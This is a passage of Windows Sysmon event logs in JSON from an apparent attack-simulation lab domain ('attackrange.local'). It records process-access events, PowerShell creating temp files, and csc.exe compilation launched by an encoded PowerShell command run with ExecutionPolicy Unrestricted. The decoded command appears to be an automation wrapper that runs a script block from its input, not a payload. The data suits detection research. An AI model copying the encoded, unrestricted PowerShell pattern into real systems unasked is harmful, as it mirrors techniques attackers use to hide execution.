C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-001080B20700}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-001080B20700}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:36.484\r\nProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nProcessId: 3396\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.dll\r\nCreationUtcTime: 2020-08-01 05:52:36.484","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:36.484","ProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.dll","CreationUtcTime":"2020-08-01 05:52:36.484","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.484\r\nProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nProcessId: 3396\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:36.484","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.484","ProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wxerclml.cmdline","CreationUtcTime":"2020-08-01 05:52:36.484","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.500\r\nProcessGuid: {A837DB8D-0324-5F25-0000-0010C9B90700}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wxerclml.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nParentProcessId: 3396\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.500","ProcessGuid":"{A837DB8D-0324-5F25-0000-0010C9B90700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wxerclml.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","ParentProcessId":"3396","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 